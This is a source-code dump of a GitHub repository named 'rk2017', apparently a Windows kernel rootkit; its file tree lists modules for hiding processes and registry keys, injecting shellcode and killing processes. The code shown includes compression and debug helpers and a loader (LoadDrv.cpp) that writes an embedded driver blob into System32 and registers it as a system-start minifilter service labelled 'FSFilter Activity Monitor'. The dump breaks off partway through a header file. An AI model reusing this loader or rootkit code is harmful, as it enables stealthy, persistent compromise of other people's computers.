├── .gitattributes ├── .gitignore ├── Inc ├── aplib.h ├── dbg.h ├── depack.c └── ntdll.h ├── LdrK ├── Debug │ ├── BuildLog.htm │ └── LdrK.exe.embed.manifest ├── DrvDat.cpp ├── DrvDat.h ├── LdrK.cpp ├── LdrK.vcproj ├── LdrK.vcproj.Seh_Cracker-PC.Seh_Cracker.user ├── LdrK.vcproj.WIN-NOI20UV8BRP.DriverTest.user ├── LoadDrv.cpp ├── LoadDrv.h ├── ReadMe.txt ├── Scsi.cpp ├── Scsi.h ├── SectorLib.cpp ├── SectorLib.h ├── Utils.cpp ├── Utils.h ├── copy.bat ├── stdafx.cpp ├── stdafx.h └── targetver.h ├── TdiFlt ├── TdiFlt.c ├── TdiFlt.h ├── TdiFlt.vcproj └── TdiFlt.vcproj.Seh_Cracker-PC.Seh_Cracker.user ├── Vfs ├── Guid.cpp ├── Guid.h ├── Setup.cpp ├── Setup.h ├── Time.cpp ├── Time.h ├── UAC.cpp ├── UAC.h ├── Vfs.cpp ├── Vfs.h ├── Vfs.vcproj ├── Vfs.vcproj.Seh_Cracker-PC.Seh_Cracker.user └── targetver.h └── rk ├── ApcKillProcess.c ├── ApcKillProcess.h ├── CommandLine.c ├── CommandLine.h ├── CopyPdb.bat ├── Crc32.c ├── Crc32.h ├── DefSSDT.h ├── DefSystemVar.h ├── DrvFileSystem.c ├── DrvFileSystem.h ├── DrvFunction.c ├── DrvFunction.h ├── DrvRegSystem.c ├── DrvRegSystem.h ├── GetProcAddr.c ├── GetProcAddr.h ├── HideProcess.c ├── HideProcess.h ├── HideReg.c ├── HideReg.h ├── InitializeInjectRelevantInfo.c ├── InitializeInjectRelevantInfo.h ├── InjectInitialize.c ├── InjectInitialize.h ├── InjectKtrapFrame.c ├── InjectKtrapFrame.h ├── InjectShellCode.h ├── IoCtlCode.h ├── KLog.c ├── KLog.h ├── Rk2017Hook.c ├── Rk2017Hook.h ├── Sector.c ├── Sector.h ├── SystemPreInit.c ├── SystemPreInit.h ├── TdiSocket.c ├── TdiSocket.h ├── TimeUtils.c ├── TimeUtils.h ├── ToolFnc.c ├── ToolFnc.h ├── Utils.c ├── Utils.h ├── rk.c ├── rk.h ├── rk.ncb ├── rk.sln ├── rk.suo ├── rk.v11.suo ├── rk.vcproj ├── rk.vcproj.Seh_Cracker-PC.Seh_Cracker.user └── rk.vcproj.WIN-NOI20UV8BRP.DriverTest.user /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | modules.order 49 | Module.symvers 50 | Mkfile.old 51 | dkms.conf 52 | -------------------------------------------------------------------------------- /Inc/aplib.h: -------------------------------------------------------------------------------- 1 | /* 2 | * aPLib compression library - the smaller the better :) 3 | * 4 | * COFF format header file 5 | * 6 | * Copyright (c) 1998-2009 by Joergen Ibsen / Jibz 7 | * All Rights Reserved 8 | * 9 | * http://www.ibsensoftware.com/ 10 | */ 11 | 12 | #ifndef APLIB_H_INCLUDED 13 | #define APLIB_H_INCLUDED 14 | 15 | #ifdef __cplusplus 16 | extern "C" { 17 | #endif 18 | 19 | #ifndef APLIB_ERROR 20 | # define APLIB_ERROR (-1) 21 | #endif 22 | 23 | unsigned int __cdecl aP_pack(const void *source, 24 | void *destination, 25 | unsigned int length, 26 | void *workmem, 27 | int (__cdecl *callback)(unsigned int, unsigned int, unsigned int, void *), 28 | void *cbparam); 29 | 30 | unsigned int __cdecl aP_workmem_size(unsigned int inputsize); 31 | 32 | unsigned int __cdecl aP_max_packed_size(unsigned int inputsize); 33 | 34 | unsigned int __cdecl aP_depack_asm(const void *source, void *destination); 35 | 36 | unsigned int __cdecl aP_depack_asm_fast(const void *source, void *destination); 37 | 38 | unsigned int __cdecl aP_depack_asm_safe(const void *source, 39 | unsigned int srclen, 40 | void *destination, 41 | unsigned int dstlen); 42 | 43 | unsigned int __cdecl aP_crc32(const void *source, unsigned int length); 44 | 45 | unsigned int __cdecl aPsafe_pack(const void *source, 46 | void *destination, 47 | unsigned int length, 48 | void *workmem, 49 | int (__cdecl *callback)(unsigned int, unsigned int, unsigned int, void *), 50 | void *cbparam); 51 | 52 | unsigned int __cdecl aPsafe_check(const void *source); 53 | 54 | unsigned int __cdecl aPsafe_get_orig_size(const void *source); 55 | 56 | unsigned int __cdecl aPsafe_depack(const void *source, 57 | unsigned int srclen, 58 | void *destination, 59 | unsigned int dstlen); 60 | 61 | #ifdef __cplusplus 62 | } /* extern "C" */ 63 | #endif 64 | 65 | #endif /* APLIB_H_INCLUDED */ 66 | 67 | 68 | #ifndef DEPACK_H_INCLUDED 69 | #define DEPACK_H_INCLUDED 70 | 71 | typedef unsigned long CRC32; 72 | 73 | #ifdef __cplusplus 74 | extern "C" { 75 | #endif 76 | 77 | #ifndef APLIB_ERROR 78 | # define APLIB_ERROR (-1) 79 | #endif 80 | 81 | /* function prototype */ 82 | unsigned int _stdcall aP_depack(const void *source, void *destination); 83 | 84 | #ifdef __cplusplus 85 | } /* extern "C" */ 86 | #endif 87 | 88 | typedef struct _AP_FILE_HEADER 89 | { 90 | unsigned long Tag; 91 | unsigned long HeaderSize; 92 | unsigned long PackedSize; 93 | CRC32 PackedCrc; 94 | unsigned long OriginalSize; 95 | }AP_FILE_HEADER, *PAP_FILE_HEADER; 96 | 97 | 98 | #endif /* DEPACK_H_INCLUDED */ 99 | -------------------------------------------------------------------------------- /Inc/dbg.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 2 | // BK driver loader project. Version 2.9.2 3 | // 4 | // module: dbg.h 5 | // $Revision: 39 $ 6 | // $Date: 2012-05-02 15:38:09 +0400 (Ср, 02 май 2012) $ 7 | // description: 8 | // Debug-build support routines and constants. 9 | 10 | #pragma once 11 | 12 | #include 13 | 14 | #if _DEBUG 15 | #define _DBG TRUE 16 | #define _TRACE_ALLOC TRUE 17 | #endif 18 | 19 | #define BAD_PTR (LONG_PTR)0xBAADF00D 20 | #define PAGE_SIZE 0x1000 21 | 22 | // Usefull types 23 | typedef INT WINERROR; // One of the Windows error codes defined within winerror.h 24 | #define ERROR_UNSUCCESSFULL 0xffffffff // Common unsuccessfull code 25 | 26 | extern HANDLE g_AppHeap; 27 | 28 | #ifdef _TRACE_ALLOC 29 | 30 | typedef struct _DBG_ALLOC 31 | { 32 | unsigned long Size; 33 | unsigned long Sing; 34 | char Buffer[1]; 35 | }DBG_ALLOC,*PDBG_ALLOC; 36 | 37 | 38 | __inline void* DbgAlloc(size_t Size) 39 | { 40 | void* mem = malloc(Size+16); 41 | if (mem) 42 | { 43 | PDBG_ALLOC pd = (PDBG_ALLOC) mem; 44 | memset(mem, 0xcc, Size+16); 45 | pd->Size = (unsigned long) Size; 46 | return(&pd->Buffer); 47 | } 48 | return(mem); 49 | } 50 | 51 | __inline void DbgFree(void* mem) 52 | { 53 | PDBG_ALLOC pd = CONTAINING_RECORD(mem, DBG_ALLOC, Buffer); 54 | if (*(unsigned long*)((PCHAR)pd->Buffer + pd->Size)!= 0xcccccccc) 55 | __debugbreak(); 56 | if (pd->Sing != 0xcccccccc) 57 | __debugbreak(); 58 | free(pd); 59 | 60 | } 61 | 62 | 63 | __inline void* DbgRealloc(void* Mem, size_t Size) 64 | { 65 | void* mem = malloc(Size+16); 66 | if (mem) 67 | { 68 | PDBG_ALLOC pd = (PDBG_ALLOC) mem; 69 | PDBG_ALLOC pd1 = CONTAINING_RECORD(Mem, DBG_ALLOC, Buffer); 70 | if (pd1->Sing != 0xcccccccc) 71 | __debugbreak(); 72 | 73 | memset(mem, 0xcc, Size+16); 74 | pd->Size = (unsigned long) Size; 75 | memcpy(&pd->Buffer, &pd1->Buffer, pd1->Size); 76 | 77 | DbgFree(Mem); 78 | return(&pd->Buffer); 79 | } 80 | 81 | return(mem); 82 | } 83 | 84 | __inline void* DbgHeapAlloc(size_t Size) 85 | { 86 | void* mem; 87 | if (g_AppHeap == 0) 88 | __debugbreak(); 89 | 90 | mem = HeapAlloc(g_AppHeap, 0, Size+16); 91 | if (mem) 92 | { 93 | PDBG_ALLOC pd = (PDBG_ALLOC) mem; 94 | memset(mem, 0xcc, Size+16); 95 | pd->Size = (unsigned long) Size; 96 | return(&pd->Buffer); 97 | } 98 | return(mem); 99 | } 100 | 101 | __inline void DbgHeapFree(void* mem) 102 | { 103 | PDBG_ALLOC pd = CONTAINING_RECORD(mem, DBG_ALLOC, Buffer); 104 | if (g_AppHeap == 0) 105 | __debugbreak(); 106 | if (*(unsigned long*)((PCHAR)pd->Buffer + pd->Size)!= 0xcccccccc) 107 | __debugbreak(); 108 | if (pd->Sing != 0xcccccccc) 109 | __debugbreak(); 110 | HeapFree(g_AppHeap, 0, pd); 111 | 112 | } 113 | 114 | 115 | __inline void* DbgHeapRealloc(void* Mem, size_t Size) 116 | { 117 | void* mem = HeapAlloc(g_AppHeap, 0, Size+16); 118 | if (mem) 119 | { 120 | PDBG_ALLOC pd = (PDBG_ALLOC) mem; 121 | PDBG_ALLOC pd1 = CONTAINING_RECORD(Mem, DBG_ALLOC, Buffer); 122 | if (g_AppHeap == 0) 123 | __debugbreak(); 124 | 125 | if (pd1->Sing != 0xcccccccc) 126 | __debugbreak(); 127 | 128 | memset(mem, 0xcc, Size+16); 129 | pd->Size = (unsigned long) Size; 130 | memcpy(&pd->Buffer, &pd1->Buffer, pd1->Size); 131 | 132 | DbgHeapFree(Mem); 133 | return(&pd->Buffer); 134 | } 135 | 136 | return(mem); 137 | } 138 | 139 | 140 | 141 | 142 | #define Alloc(x) DbgAlloc(x) 143 | #define Free(x) DbgFree(x)//;x = (PVOID)BAD_PTR 144 | #define Realloc(x,y) DbgRealloc(x,y) 145 | 146 | #define hAlloc(x) DbgHeapAlloc(x) 147 | #define hFree(x) DbgHeapFree(x)//;x = (PVOID)BAD_PTR 148 | #define hRealloc(x,y) DbgHeapRealloc(x,y) 149 | 150 | #else 151 | 152 | #define Alloc(x) LocalAlloc(LPTR, x) 153 | #define Free(x) LocalFree(x) 154 | #define Realloc(x,y) LocalReAlloc(x, y, LPTR) 155 | 156 | #define hAlloc(x) HeapAlloc(g_AppHeap, 0, x) 157 | #define hFree(x) HeapFree(g_AppHeap, 0, x) 158 | 159 | 160 | #endif 161 | 162 | 163 | #define vAlloc(x) VirtualAlloc(0, x, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) 164 | #define vFree(x) VirtualFree(x, 0, MEM_RELEASE) 165 | 166 | 167 | #ifdef _DBG 168 | 169 | 170 | 171 | #pragma warning(disable:4996) // 'sprintf': This function or variable may be unsafe. 172 | #define DbgPrint(args, ...) \ 173 | { char* buff = (char*)LocalAlloc(LPTR, 0x100); \ 174 | wsprintfA(buff, args, __VA_ARGS__); \ 175 | OutputDebugStringA((LPCSTR)buff); \ 176 | LocalFree(buff); } 177 | 178 | #define DbgPrintW(args, ...) \ 179 | { wchar_t* buff = (wchar_t*)LocalAlloc(LPTR, 0x400); \ 180 | wsprintfW(buff, args, __VA_ARGS__); \ 181 | OutputDebugStringW((LPCWSTR)buff); \ 182 | LocalFree(buff); } 183 | 184 | #define ASSERT(x) _ASSERT(x) 185 | 186 | 187 | #else 188 | #define DbgPrint(x, ...) 189 | #define DbgPrintW(x, ...) 190 | #define ASSERT(x) 191 | /* 192 | #define Alloc(x) malloc(x) 193 | #define Free(x) free(x) 194 | #define Realloc(x,y) realloc(x,y) 195 | 196 | */ 197 | #endif 198 | 199 | -------------------------------------------------------------------------------- /Inc/depack.c: -------------------------------------------------------------------------------- 1 | /* 2 | * aPLib compression library - the smaller the better :) 3 | * 4 | * C depacker 5 | * 6 | * Copyright (c) 1998-2009 by Joergen Ibsen / Jibz 7 | * All Rights Reserved 8 | * 9 | * http://www.ibsensoftware.com/ 10 | */ 11 | 12 | #include "aplib.h" 13 | 14 | /* internal data structure */ 15 | typedef struct { 16 | const unsigned char *source; 17 | unsigned char *destination; 18 | unsigned int tag; 19 | unsigned int bitcount; 20 | } APDEPACKDATA; 21 | 22 | static int aP_getbit(APDEPACKDATA *ud) 23 | { 24 | unsigned int bit; 25 | 26 | /* check if tag is empty */ 27 | if (!ud->bitcount--) 28 | { 29 | /* load next tag */ 30 | ud->tag = *ud->source++; 31 | ud->bitcount = 7; 32 | } 33 | 34 | /* shift bit out of tag */ 35 | bit = (ud->tag >> 7) & 0x01; 36 | ud->tag <<= 1; 37 | 38 | return bit; 39 | } 40 | 41 | static unsigned int aP_getgamma(APDEPACKDATA *ud) 42 | { 43 | unsigned int result = 1; 44 | 45 | /* input gamma2-encoded bits */ 46 | do { 47 | result = (result << 1) + aP_getbit(ud); 48 | } while (aP_getbit(ud)); 49 | 50 | return (result); 51 | } 52 | 53 | unsigned int _stdcall aP_depack(const void *source, void *destination) 54 | { 55 | APDEPACKDATA ud; 56 | unsigned int offs, len, R0, LWM; 57 | int done; 58 | int i; 59 | 60 | ud.source = (const unsigned char *) source; 61 | ud.destination = (unsigned char *) destination; 62 | ud.bitcount = 0; 63 | 64 | LWM = 0; 65 | done = 0; 66 | 67 | /* first byte verbatim */ 68 | *ud.destination++ = *ud.source++; 69 | 70 | /* main decompression loop */ 71 | while (!done) 72 | { 73 | if (aP_getbit(&ud)) 74 | { 75 | if (aP_getbit(&ud)) 76 | { 77 | if (aP_getbit(&ud)) 78 | { 79 | offs = 0; 80 | 81 | for (i = 4; i; i--) offs = (offs << 1) + aP_getbit(&ud); 82 | 83 | if (offs) 84 | { 85 | *ud.destination = *(ud.destination - offs); 86 | ud.destination++; 87 | } else { 88 | *ud.destination++ = 0x00; 89 | } 90 | 91 | LWM = 0; 92 | 93 | } else { 94 | 95 | offs = *ud.source++; 96 | 97 | len = 2 + (offs & 0x0001); 98 | 99 | offs >>= 1; 100 | 101 | if (offs) 102 | { 103 | for (; len; len--) 104 | { 105 | *ud.destination = *(ud.destination - offs); 106 | ud.destination++; 107 | } 108 | } else done = 1; 109 | 110 | R0 = offs; 111 | LWM = 1; 112 | } 113 | 114 | } else { 115 | 116 | offs = aP_getgamma(&ud); 117 | 118 | if ((LWM == 0) && (offs == 2)) 119 | { 120 | offs = R0; 121 | 122 | len = aP_getgamma(&ud); 123 | 124 | for (; len; len--) 125 | { 126 | *ud.destination = *(ud.destination - offs); 127 | ud.destination++; 128 | } 129 | 130 | } else { 131 | 132 | if (LWM == 0) offs -= 3; else offs -= 2; 133 | 134 | offs <<= 8; 135 | offs += *ud.source++; 136 | 137 | len = aP_getgamma(&ud); 138 | 139 | if (offs >= 32000) len++; 140 | if (offs >= 1280) len++; 141 | if (offs < 128) len += 2; 142 | 143 | for (; len; len--) 144 | { 145 | *ud.destination = *(ud.destination - offs); 146 | ud.destination++; 147 | } 148 | 149 | R0 = offs; 150 | } 151 | 152 | LWM = 1; 153 | } 154 | 155 | } else { 156 | 157 | *ud.destination++ = *ud.source++; 158 | LWM = 0; 159 | } 160 | } 161 | 162 | return (unsigned int)(ud.destination - (unsigned char *)destination); 163 | } 164 | -------------------------------------------------------------------------------- /LdrK/Debug/BuildLog.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/LdrK/Debug/BuildLog.htm -------------------------------------------------------------------------------- /LdrK/Debug/LdrK.exe.embed.manifest: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /LdrK/DrvDat.h: -------------------------------------------------------------------------------- 1 | #ifndef __DRV_DAT_H__ 2 | #define __DRV_DAT_H__ 3 | 4 | #define RK2017_DRV_LENGTH 34816 5 | 6 | extern unsigned char g_DrvDat[RK2017_DRV_LENGTH]; 7 | #endif -------------------------------------------------------------------------------- /LdrK/LdrK.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/LdrK/LdrK.cpp -------------------------------------------------------------------------------- /LdrK/LdrK.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/LdrK/LdrK.vcproj -------------------------------------------------------------------------------- /LdrK/LdrK.vcproj.Seh_Cracker-PC.Seh_Cracker.user: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 11 | 35 | 36 | 39 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /LdrK/LdrK.vcproj.WIN-NOI20UV8BRP.DriverTest.user: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 11 | 35 | 36 | 39 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /LdrK/LoadDrv.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include "DrvDat.h" 3 | #include "Utils.h" 4 | #include "LoadDrv.h" 5 | 6 | HANDLE g_hDevice = NULL; 7 | 8 | BOOL Unpack() 9 | { 10 | BOOL bRet = FALSE; 11 | ULONG ulRetReadBytes = 0; 12 | HANDLE hFile = INVALID_HANDLE_VALUE; 13 | WCHAR wSysDir[MAX_PATH] = {0}; 14 | WCHAR SysPath[MAX_PATH] = {0}; 15 | 16 | GetSystemDirectoryW(wSysDir,MAX_PATH); 17 | wsprintfW(SysPath,L"%s\\%s",wSysDir,DRIVER_NAMEW L".sys"); 18 | 19 | hFile = CreateFileW(SysPath, \ 20 | FILE_ALL_ACCESS, \ 21 | FILE_SHARE_READ | FILE_SHARE_WRITE, \ 22 | NULL, \ 23 | CREATE_ALWAYS, \ 24 | FILE_ATTRIBUTE_NORMAL, \ 25 | NULL); 26 | if (FALSE == hFile) 27 | { 28 | return bRet; 29 | } 30 | bRet = WriteFile(hFile, \ 31 | g_DrvDat, \ 32 | RK2017_DRV_LENGTH, \ 33 | &ulRetReadBytes, \ 34 | NULL); 35 | if (FALSE == bRet) 36 | { 37 | if (hFile) 38 | { 39 | CloseHandle(hFile); 40 | hFile = NULL; 41 | } 42 | return bRet; 43 | } 44 | if (hFile) 45 | { 46 | CloseHandle(hFile); 47 | hFile = NULL; 48 | } 49 | return bRet; 50 | } 51 | BOOLEAN InstallAndLdrDrv() 52 | { 53 | WCHAR SysPath[MAX_PATH] = {0}; 54 | CHAR DrvPath[MAX_PATH] = {0}; 55 | ULONG ulLdrCnt; 56 | BOOLEAN bRet = FALSE; 57 | 58 | if(!Unpack()) 59 | { 60 | return FALSE; 61 | } 62 | wsprintfW(SysPath,L"%s\\%s",L"\\SystemRoot\\System32",DRIVER_NAMEW L".sys"); 63 | RtlZeroMemory(DrvPath,MAX_PATH); 64 | UnicodeToAnsi(SysPath,DrvPath,MAX_PATH); 65 | 66 | for (ulLdrCnt = 0;ulLdrCnt < 0x100;ulLdrCnt++) 67 | { 68 | if (MiniFilerLoadDrv(DRIVER_NAMEA,DrvPath,"370090") == TRUE) 69 | { 70 | bRet = TRUE; 71 | break; 72 | } 73 | Sleep(1000); 74 | } 75 | return bRet; 76 | } 77 | HANDLE OpenDevice() 78 | { 79 | HANDLE hDevice = INVALID_HANDLE_VALUE; 80 | WCHAR DeviceName[MAX_PATH] = {0}; 81 | if((GetVersion() & 0xFF) >= 5) 82 | { 83 | wsprintfW(DeviceName,L"\\\\.\\Global\\%s",RK2017_BASENAME); 84 | } 85 | else 86 | { 87 | wsprintfW(DeviceName,L"\\\\.\\%s",RK2017_BASENAME); 88 | } 89 | hDevice = CreateFileW(DeviceName, 90 | GENERIC_READ | GENERIC_WRITE, 91 | 0, 92 | NULL, 93 | OPEN_EXISTING, 94 | FILE_ATTRIBUTE_NORMAL, 95 | 0); 96 | if(hDevice==INVALID_HANDLE_VALUE) 97 | { 98 | return NULL; 99 | } 100 | return hDevice; 101 | } 102 | 103 | BOOL CheckServiceIsExist(PCHAR pServiceName) 104 | { 105 | SC_HANDLE hScManager = OpenSCManagerA(NULL,NULL,GENERIC_EXECUTE); 106 | if(hScManager == NULL) 107 | { 108 | return FALSE; 109 | } 110 | SC_HANDLE hScService = OpenServiceA(hScManager,pServiceName,SERVICE_START | SERVICE_QUERY_STATUS | SERVICE_STOP); 111 | if(hScService == NULL) 112 | { 113 | CloseServiceHandle(hScManager); 114 | return FALSE; 115 | } 116 | CloseServiceHandle(hScService); 117 | CloseServiceHandle(hScManager); 118 | return TRUE; 119 | } 120 | BOOL CheckServiceIsRun(PCHAR pServiceName) 121 | { 122 | BOOL bRet = FALSE; 123 | SC_HANDLE hScManager,hScService; 124 | SERVICE_STATUS ServiceStatus; 125 | hScManager = OpenSCManagerA(NULL,NULL,SC_MANAGER_ALL_ACCESS); 126 | if(hScManager != NULL) 127 | { 128 | hScService = OpenServiceA(hScManager,pServiceName,SERVICE_QUERY_STATUS); 129 | if(hScService != NULL) 130 | { 131 | QueryServiceStatus(hScService,&ServiceStatus); 132 | if(ServiceStatus.dwCurrentState == SERVICE_RUNNING) 133 | { 134 | bRet = TRUE; 135 | } 136 | CloseServiceHandle(hScService); 137 | } 138 | CloseServiceHandle(hScManager); 139 | } 140 | return bRet; 141 | } 142 | BOOL InstallMiniDriver(const char* lpszDriverName,const char* lpszDriverPath,const char* lpszAltitude) 143 | { 144 | char szTempStr[MAX_PATH]; 145 | HKEY hKey; 146 | DWORD dwData; 147 | //char szDriverImagePath[MAX_PATH]; 148 | SC_HANDLE hServiceMgr = NULL; 149 | SC_HANDLE hService = NULL; 150 | 151 | if(NULL == lpszDriverName || NULL == lpszDriverPath) 152 | { 153 | return FALSE; 154 | } 155 | //GetFullPathNameA(lpszDriverPath,MAX_PATH,szDriverImagePath,NULL); 156 | hServiceMgr = OpenSCManagerA( NULL, NULL, SC_MANAGER_ALL_ACCESS ); 157 | if(hServiceMgr == NULL) 158 | { 159 | CloseServiceHandle(hServiceMgr); 160 | return FALSE; 161 | } 162 | hService = CreateServiceA(hServiceMgr, 163 | lpszDriverName, 164 | lpszDriverName, 165 | SERVICE_ALL_ACCESS, 166 | SERVICE_KERNEL_DRIVER, 167 | SERVICE_SYSTEM_START, 168 | SERVICE_ERROR_NORMAL, 169 | lpszDriverPath, 170 | "FSFilter Activity Monitor", 171 | NULL, 172 | "FltMgr", 173 | NULL, 174 | NULL); 175 | 176 | if(hService == NULL) 177 | { 178 | if(GetLastError() == ERROR_SERVICE_EXISTS) 179 | { 180 | CloseServiceHandle(hService); 181 | CloseServiceHandle(hServiceMgr); 182 | return TRUE; 183 | } 184 | else 185 | { 186 | CloseServiceHandle(hService); 187 | CloseServiceHandle(hServiceMgr); 188 | return FALSE; 189 | } 190 | } 191 | CloseServiceHandle(hService); 192 | CloseServiceHandle(hServiceMgr); 193 | 194 | strcpy(szTempStr,"SYSTEM\\CurrentControlSet\\Services\\"); 195 | strcat(szTempStr,lpszDriverName); 196 | strcat(szTempStr,"\\Instances"); 197 | if(RegCreateKeyExA(HKEY_LOCAL_MACHINE,szTempStr,0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,(LPDWORD)&dwData)!=ERROR_SUCCESS) 198 | { 199 | return FALSE; 200 | } 201 | strcpy(szTempStr,lpszDriverName); 202 | strcat(szTempStr," Instance"); 203 | if(RegSetValueExA(hKey,"DefaultInstance",0,REG_SZ,(CONST BYTE*)szTempStr,(DWORD)strlen(szTempStr))!=ERROR_SUCCESS) 204 | { 205 | return FALSE; 206 | } 207 | RegFlushKey(hKey); 208 | RegCloseKey(hKey); 209 | 210 | strcpy(szTempStr,"SYSTEM\\CurrentControlSet\\Services\\"); 211 | strcat(szTempStr,lpszDriverName); 212 | strcat(szTempStr,"\\Instances\\"); 213 | strcat(szTempStr,lpszDriverName); 214 | strcat(szTempStr," Instance"); 215 | if(RegCreateKeyExA(HKEY_LOCAL_MACHINE,szTempStr,0,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,(LPDWORD)&dwData)!=ERROR_SUCCESS) 216 | { 217 | return FALSE; 218 | } 219 | strcpy(szTempStr,lpszAltitude); 220 | if(RegSetValueExA(hKey,"Altitude",0,REG_SZ,(CONST BYTE*)szTempStr,(DWORD)strlen(szTempStr))!=ERROR_SUCCESS) 221 | { 222 | return FALSE; 223 | } 224 | dwData = 0x0; 225 | if(RegSetValueExA(hKey,"Flags",0,REG_DWORD,(CONST BYTE*)&dwData,sizeof(DWORD))!=ERROR_SUCCESS) 226 | { 227 | return FALSE; 228 | } 229 | RegFlushKey(hKey); 230 | RegCloseKey(hKey); 231 | return TRUE; 232 | } 233 | BOOL StartMiniDriver(const char* lpszDriverName) 234 | { 235 | SC_HANDLE schManager; 236 | SC_HANDLE schService; 237 | 238 | if(NULL==lpszDriverName) 239 | { 240 | return FALSE; 241 | } 242 | 243 | schManager = OpenSCManagerA(NULL,NULL,SC_MANAGER_ALL_ACCESS); 244 | if(NULL==schManager) 245 | { 246 | CloseServiceHandle(schManager); 247 | return FALSE; 248 | } 249 | schService = OpenServiceA(schManager,lpszDriverName,SERVICE_ALL_ACCESS); 250 | if(NULL == schService) 251 | { 252 | CloseServiceHandle(schService); 253 | CloseServiceHandle(schManager); 254 | return FALSE; 255 | } 256 | 257 | if(!StartServiceA(schService,0,NULL)) 258 | { 259 | CloseServiceHandle(schService); 260 | CloseServiceHandle(schManager); 261 | if(GetLastError() == ERROR_SERVICE_ALREADY_RUNNING) 262 | { 263 | return TRUE; 264 | } 265 | return FALSE; 266 | } 267 | CloseServiceHandle(schService); 268 | CloseServiceHandle(schManager); 269 | return TRUE; 270 | } 271 | BOOL StopMiniDriver(const char* lpszDriverName) 272 | { 273 | SC_HANDLE schManager; 274 | SC_HANDLE schService; 275 | SERVICE_STATUS svcStatus; 276 | bool bStopped=false; 277 | 278 | schManager=OpenSCManagerA(NULL,NULL,SC_MANAGER_ALL_ACCESS); 279 | if(NULL==schManager) 280 | { 281 | return FALSE; 282 | } 283 | schService=OpenServiceA(schManager,lpszDriverName,SERVICE_ALL_ACCESS); 284 | if(NULL==schService) 285 | { 286 | CloseServiceHandle(schManager); 287 | return FALSE; 288 | } 289 | if(!ControlService(schService,SERVICE_CONTROL_STOP,&svcStatus) && (svcStatus.dwCurrentState!=SERVICE_STOPPED)) 290 | { 291 | CloseServiceHandle(schService); 292 | CloseServiceHandle(schManager); 293 | return FALSE; 294 | } 295 | 296 | CloseServiceHandle(schService); 297 | CloseServiceHandle(schManager); 298 | 299 | return TRUE; 300 | } 301 | BOOL DeleteMiniDriver(const char* lpszDriverName) 302 | { 303 | SC_HANDLE schManager; 304 | SC_HANDLE schService; 305 | SERVICE_STATUS svcStatus; 306 | 307 | schManager=OpenSCManagerA(NULL,NULL,SC_MANAGER_ALL_ACCESS); 308 | if(NULL==schManager) 309 | { 310 | return FALSE; 311 | } 312 | schService=OpenServiceA(schManager,lpszDriverName,SERVICE_ALL_ACCESS); 313 | if(NULL==schService) 314 | { 315 | CloseServiceHandle(schManager); 316 | return FALSE; 317 | } 318 | ControlService(schService,SERVICE_CONTROL_STOP,&svcStatus); 319 | if(!DeleteService(schService)) 320 | { 321 | CloseServiceHandle(schService); 322 | CloseServiceHandle(schManager); 323 | return FALSE; 324 | } 325 | CloseServiceHandle(schService); 326 | CloseServiceHandle(schManager); 327 | 328 | return TRUE; 329 | } 330 | BOOLEAN MiniFilerLoadDrv(PCHAR pDriverName,PCHAR pDriverPath,PCHAR pAltitude) 331 | { 332 | BOOLEAN bRet; 333 | 334 | bRet = FALSE; 335 | 336 | if (InstallMiniDriver(pDriverName,pDriverPath,pAltitude) == TRUE) 337 | { 338 | bRet = StartMiniDriver(pDriverName); 339 | } 340 | else 341 | { 342 | bRet = StartMiniDriver(pDriverName); 343 | if (bRet == FALSE) 344 | { 345 | StopMiniDriver(pDriverName); 346 | DeleteMiniDriver(pDriverName); 347 | if (InstallMiniDriver(pDriverName,pDriverPath,pAltitude) == TRUE) 348 | { 349 | bRet = StartMiniDriver(pDriverName); 350 | } 351 | } 352 | } 353 | 354 | //if (CheckServiceIsExist(pDriverName)) 355 | //{ 356 | // bRet = StartMiniDriver(pDriverName); 357 | // if (bRet == FALSE) 358 | // { 359 | // StopMiniDriver(pDriverName); 360 | // DeleteMiniDriver(pDriverName); 361 | // if (InstallMiniDriver(pDriverName,pDriverPath,pAltitude) == TRUE) 362 | // { 363 | // bRet = StartMiniDriver(pDriverName); 364 | // } 365 | // } 366 | //} 367 | return bRet; 368 | } -------------------------------------------------------------------------------- /LdrK/LoadDrv.h: -------------------------------------------------------------------------------- 1 | #ifndef __LOAD_DRV_H__ 2 | #define __LOAD_DRV_H__ 3 | 4 | #define DRIVER_NAMEA "rk" 5 | #define DRIVER_NAMEW L"rk" 6 | #define SERVICE_KEY L"SYSTEM\\CurrentControlSet\\Services\\" DRIVER_NAMEW 7 | 8 | BOOL Unpack(); 9 | BOOLEAN InstallAndLdrDrv(); 10 | HANDLE OpenDevice(); 11 | BOOL CheckServiceIsExist(PCHAR pServiceName); 12 | BOOL CheckServiceIsRun(PCHAR 